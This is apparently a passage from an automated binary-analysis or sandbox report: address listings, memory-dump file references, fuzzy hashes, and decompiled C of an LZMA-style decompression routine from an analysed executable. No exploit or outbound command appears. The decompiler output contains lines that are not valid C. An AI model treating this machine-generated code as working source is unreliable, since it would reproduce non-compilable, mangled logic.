													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x004064ee
0x004064ee
0x004064f2
0x004064ff
0x00406509
0x00000000
0x004064f4
0x004064f4
0x0040652f
0x00406532
0x00406535
0x00406538
0x00406538
0x0040653b
0x00406542
0x00406547
0x00406428
0x0040642b
0x0040679d
0x0040679d
0x0040679d
0x004067a0
0x004067a0
0x004067a0
0x004067a6
0x004067ac
0x004067b2
0x004067cc
0x004067cf
0x004067d5
0x004067e0
0x004067e2
0x004067b4
0x004067b4
0x004067c3
0x004067c7
0x004067c7
0x004067ec
0x00000000
0x00000000
0x004067ee
0x004067f2
0x004069a1
0x004069b7
0x004069bf
0x004069c6
0x004069c8
0x004069cf
0x004069d3
0x004069d3
0x004067fe
0x00406805
0x0040680d
0x00406810
0x00406813
0x00406813
0x00406819
0x00406819
0x00405fb5
0x00405fb5
0x00405fb5
0x00405fbe
0x00000000
0x00000000
0x00405fc4
0x00000000
0x00405fcf
0x00000000
0x00000000
0x00405fd8
0x00405fdb
0x00405fde
0x00405fe2
0x00000000
0x00000000
0x00405fe8
0x00405feb
0x00405fed
0x00405fee
0x00405ff1
0x00405ff3
0x00405ff4
0x00405ff6
0x00405ff9
0x00405ffe
0x00406003
0x0040600c
0x0040601f
0x00406022
0x0040602e
0x00406056
0x00406058
0x00406066
0x00406066
0x0040606a
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605a
0x0040605a
0x0040605d
0x0040605e
0x0040605e
0x00000000
0x0040605a
0x00406034
0x00406039
0x00406039
0x00406042
0x0040604a
0x0040604d
0x00000000
0x00406053
0x00406053
0x00000000
0x00406053
0x00000000
0x00406070
0x00406070
0x00406074
0x00406920
0x00000000
0x00406920
0x0040607d
0x0040608d
0x00406090
0x00406093
0x00406093
0x00406093
0x00406096
0x0040609a
0x00000000
0x00000000
0x0040609c
0x004060a2
0x004060cc
0x004060d2
0x004060d9
0x00000000
0x004060d9
0x004060a8
0x004060ab
0x004060b0
0x004060b0
0x004060bb
0x004060c3
0x004060c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040610b
0x00406111
0x00406114
0x00406121
0x00406129
0x0040679d
0x0040679d
0x00000000
0x00000000
0x004060e0
0x004060e0
0x004060e4
0x0040692f
0x00000000
0x0040692f
0x004060f0
0x004060fb
0x004060fb
0x004060fb
0x004060fe
0x00406101
0x00406104
0x00406109
0x00000000
0x00000000
0x00000000
0x00000000
0x004067a0
0x004067a0
0x004067a6
0x004067ac
0x004067b2
0x004067cc
0x004067cf
0x004067d5
0x004067e0
0x004067e2
0x004067b4
0x004067b4
0x004067c3
0x004067c7
0x004067c7
0x004067ec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406131
0x00406133
0x00406136
0x004061a7
0x004061aa
0x004061ad
0x004061b4
0x004061be
0x0040679d
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x0040679d
0x00406138
0x0040613c
0x0040613f
0x00406141
0x00406144
0x00406147
0x00406149
0x0040614c
0x0040614e
0x00406153
0x00406156
0x00406159
0x0040615d
0x00406164
0x00406167
0x0040616e
0x00406172
0x0040617a
0x0040617a
0x0040617a
0x00406174
0x00406174
0x00406174
0x00406169
0x00406169
0x00406169
0x0040617e
0x00406181
0x0040619f
0x004061a1
0x00000000
0x00406183
0x00406183
0x00406186
0x00406189
0x0040618c
0x0040618e
0x0040618e
0x0040618e
0x00406191
0x00406194
0x00406196
0x00406197
0x0040619a
0x00000000
0x0040619a
0x00000000
0x004063d0
0x004063d4
0x004063f2
0x004063f5
0x004063fc
0x004063ff
0x00406402
0x00406405
0x00406408
0x0040640b
0x0040640d
0x00406414
0x00406415
0x00406417
0x0040641a
0x0040641d
0x00406420
0x00406420
0x00406425
0x00000000
0x00406425
0x004063d6
0x004063d9
0x004063dc
0x004063e6
0x0040679d
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x00000000
0x0040643a
0x0040643e
0x00406461
0x00406464
0x00406467
0x00406471
0x00406440
0x00406440
0x00406443
0x00406446
0x00406449
0x00406456
0x00406459
0x00406459
0x0040679d
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x00000000
0x0040647d
0x00406481
0x00000000
0x00000000
0x00406487
0x0040648b
0x00000000
0x00000000
0x00406491
0x00406493
0x00406497
0x00406497
0x0040649a
0x0040649e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406515
0x00406519
0x00406520
0x00406523
0x00406526
0x0040651b
0x0040651b
0x0040651b
0x00406529
0x0040652c
0x00000000
0x00000000
0x004065d5
0x004065d5
0x004065d9
0x00406977
0x00000000
0x00406977
0x004065df
0x004065e2
0x004065e5
0x004065e9
0x004065ec
0x004065f2
0x004065f4
0x004065f4
0x004065f4
0x004065f7
0x004065fa
0x00000000
0x00000000
0x004061ca
0x004061ca
0x004061ce
0x0040693b
0x00000000
0x0040693b
0x004061d4
0x004061d7
0x004061da
0x004061de
0x004061e1
0x004061e7
0x004061e9
0x004061e9
0x004061e9
0x004061ec
0x004061ef
0x004061ef
0x004061f2
0x004061f5
0x00000000
0x00000000
0x004061fb
0x00406201
0x00000000
0x00000000
0x00406207
0x00406207
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x00406218
0x0040621b
0x0040621d
0x00406223
0x00406226
0x00406229
0x0040622c
0x0040622f
0x00406232
0x00406235
0x00406251
0x00406254
0x00406257
0x0040625a
0x00406261
0x00406265
0x00406267
0x0040626b
0x00406237
0x00406237
0x0040623b
0x00406243
0x00406248
0x0040624a
0x0040624c
0x0040624c
0x0040626e
0x00406275
0x00406278
0x00000000
0x0040627e
0x00000000
0x0040627e
0x00000000
0x00406283
0x00406283
0x00406287
0x00406947
0x00000000
0x00406947
0x0040628d
0x00406290
0x00406293
0x00406297
0x0040629a
0x004062a0
0x004062a2
0x004062a2
0x004062a2
0x004062a5
0x004062a8
0x004062a8
0x004062a8
0x004062ae
0x00000000
0x00000000
0x004062b0
0x004062b3
0x004062b6
0x004062b9
0x004062bc
0x004062bf
0x004062c2
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062e6
0x004062e9
0x004062ec
0x004062ef
0x004062ef
0x004062f2
0x004062f6
0x004062f8
0x004062d0
0x004062d0
0x004062d8
0x004062dd
0x004062df
0x004062e1
0x004062e1
0x004062fb
0x00406302
0x00406305
0x00000000
0x00406307
0x00000000
0x00406307
0x00406305
0x0040630c
0x0040630c
0x0040630c
0x0040630c
0x00000000
0x00000000
0x00406347
0x00406347
0x0040634b
0x00406953
0x00000000
0x00406953
0x00406351
0x00406354
0x00406357
0x0040635b
0x0040635e
0x00406364
0x00406366
0x00406366
0x00406366
0x00406369
0x0040636c
0x0040636c
0x00406372
0x00406310
0x00406310
0x00406313
0x00000000
0x00406313
0x00406374
0x00406374
0x00406377
0x0040637a
0x0040637d
0x00406380
0x00406383
0x00406386
0x00406389
0x0040638c
0x0040638f
0x00406392
0x004063aa
0x004063ad
0x004063b0
0x004063b3
0x004063b3
0x004063b6
0x004063ba
0x004063bc
0x00406394
0x00406394
0x0040639c
0x004063a1
0x004063a3
0x004063a5
0x004063a5
0x004063bf
0x004063c6
0x004063c9
0x00000000
0x004063cb
0x00000000
0x004063cb
0x00000000
0x00406658
0x00406658
0x0040665c
0x00406983
0x00000000
0x00406983
0x00406662
0x00406665
0x00406668
0x0040666c
0x0040666f
0x00406675
0x00406677
0x00406677
0x00406677
0x0040667a
0x00000000
0x00000000
0x00000000
0x00000000
0x00406767
0x0040676b
0x0040678d
0x00406790
0x0040679a
0x0040679d
0x0040679d
0x0040679d
0x00000000
0x0040679d
0x0040679d
0x0040676d
0x00406770
0x00406774
0x00406777
0x00406777
0x0040677a
0x00000000
0x00000000
0x00406824
0x00406828
0x00406846
0x00406846
0x00406846
0x0040684d
0x00406854
0x0040685b
0x0040685b
0x00000000
0x0040685b
0x0040682a
0x0040682d
0x00406830
0x00406833
0x0040683a
0x0040677e
0x0040677e
0x00406781
0x00000000
0x00000000
0x00406915
0x00406918
0x00406819
0x00000000
0x00000000
0x0040654f
0x00406551
0x00406558
0x00406559
0x0040655b
0x0040655e
0x00000000
0x00000000
0x00406566
0x00406569
0x0040656c
0x0040656e
0x00406570
0x00406570
0x00406571
0x00406574
0x0040657b
0x0040657e
0x0040658c
0x00000000
0x00000000
0x00406862
0x00406862
0x00406865
0x0040686c
0x00000000
0x00000000
0x00406871
0x00406871
0x00406875
0x004069ad
0x00000000
0x004069ad
0x0040687b
0x0040687e
0x00406881
0x00406885
0x00406888
0x0040688e
0x00406890
0x00406890
0x00406890
0x00406893
0x00406896
0x00406896
0x00406896
0x00406896
0x00406899
0x00406899
0x0040689d
0x004068fd
0x00406900
0x00406905
0x00406906
0x00406908
0x0040690a
0x0040690d
0x00406819
0x00406819
0x00000000
0x0040681f
0x00406819
0x0040689f
0x004068a5
0x004068a8
0x004068ab
0x004068ae
0x004068b1
0x004068b4
0x004068b7
0x004068ba
0x004068bd
0x004068c0
0x004068d9
0x004068dc
0x004068df
0x004068e2
0x004068e6
0x004068e8
0x004068e8
0x004068e9
0x004068ec
0x004068c2
0x004068c2
0x004068ca
0x004068cf
0x004068d1
0x004068d4
0x004068d4
0x004068ef
0x004068f6
0x00000000
0x004068f8
0x00000000
0x004068f8
0x00000000
0x00406594
0x00406597
0x004065cd
0x004066fd
0x004066fd
0x004066fd
0x004066fd
0x00406700
0x00406700
0x00406703
0x00406705
0x0040698f
0x00000000
0x0040698f
0x0040670b
0x0040670e
0x00000000
0x00000000
0x00406714
0x00406718
0x0040671b
0x0040671b
0x0040671b
0x00000000
0x0040671b
0x00406599
0x0040659b
0x0040659d
0x0040659f
0x004065a2
0x004065a3
0x004065a5
0x004065a7
0x004065aa
0x004065ad
0x004065c3
0x004065c8
0x00406600
0x00406600
0x00406604
0x00406630
0x00406632
0x00406639
0x0040663c
0x0040663f
0x0040663f
0x00406644
0x00406644
0x00406646
0x00406649
0x00406650
0x00406653
0x00406680
0x00406680
0x00406683
0x00406686
0x004066fa
0x004066fa
0x004066fa
0x00000000
0x004066fa
0x00406688
0x0040668e
0x00406691
0x00406694
0x00406697
0x0040669a
0x0040669d
0x004066a0
0x004066a3
0x004066a6
0x004066a9
0x004066c2
0x004066c4
0x004066c7
0x004066c8
0x004066cb
0x004066cd
0x004066d0
0x004066d2
0x004066d4
0x004066d7
0x004066d9
0x004066dc
0x004066e0
0x004066e2
0x004066e2
0x004066e3
0x004066e6
0x004066e9
0x004066ab
0x004066ab
0x004066b3
0x004066b8
0x004066ba
0x004066bd
0x004066bd
0x004066ec
0x004066f3
0x0040667d
0x0040667d
0x0040667d
0x0040667d
0x00000000
0x004066f5
0x00000000
0x004066f5
0x004066f3
0x00406606
0x00406609
0x0040660b
0x0040660e
0x00406611
0x00406614
0x00406616
0x00406619
0x0040661c
0x0040661c
0x0040661f
0x0040661f
0x00406622
0x00406629
0x004065fd
0x004065fd
0x004065fd
0x004065fd
0x00000000
0x0040662b
0x00000000
0x0040662b
0x00406629
0x004065af
0x004065b2
0x004065b4
0x004065b7
0x00000000
0x00000000
0x00406316
0x00406316
0x0040631a
0x0040695f
0x00000000
0x0040695f
0x00406320
0x00406323
0x00406326
0x00406329
0x0040632c
0x0040632f
0x00406332
0x00406334
0x00406337
0x0040633a
0x0040633d
0x0040633f
0x0040633f
0x0040633f
0x00000000
0x00000000
0x004064a1
0x004064a1
0x004064a5
0x0040696b
0x00000000
0x0040696b
0x004064ab
0x004064ae
0x004064b1
0x004064b4
0x004064b6
0x004064b6
0x004064b6
0x004064b9
0x004064bc
0x004064bf
0x004064c2
0x004064c5
0x004064c8
0x004064c9
0x004064cb
0x004064cb
0x004064cb
0x004064ce
0x004064d1
0x004064d4
0x004064d7
0x004064d7
0x004064d7
0x004064da
0x004064dc
0x004064dc
0x00000000
0x00000000
0x0040671e
0x0040671e
0x0040671e
0x00406722
0x00000000
0x00000000
0x00406728
0x0040672b
0x0040672e
0x00406731
0x00406733
0x00406733
0x00406733
0x00406736
0x00406739
0x0040673c
0x0040673f
0x00406742
0x00406745
0x00406746
0x00406748
0x00406748
0x00406748
0x0040674b
0x0040674e
0x00406751
0x00406754
0x00406757
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00406762
0x004064df
0x004064df
0x00000000
0x004064df
0x00406760
0x00406995
0x00000000
0x00000000
0x00405fc4
0x004069cc
0x004069cc
0x00000000
0x004069cc
0x00406819
0x004067a0
0x0040679d
0x00000000
0x004064f2

Memory Dump Source

Source File: 00000000.00000002.235639833.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.235624875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235686951.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.235711647.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235739644.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235757684.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.235776778.000000000042C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
Instruction ID: 067b91939e33353516387f96afd3df60e22fb0a2a23546be1218d687de4ca84d
Opcode Fuzzy Hash: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
Instruction Fuzzy Hash: 14715371E00229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7799996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040643A, Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040643A() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t258 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t258;
											0 | _t258 = _t258 + _t258 + 9;
											 *(__ebp - 0x38) = _t258 + _t258 + 9;
											goto L75;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x28);
											goto L88;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
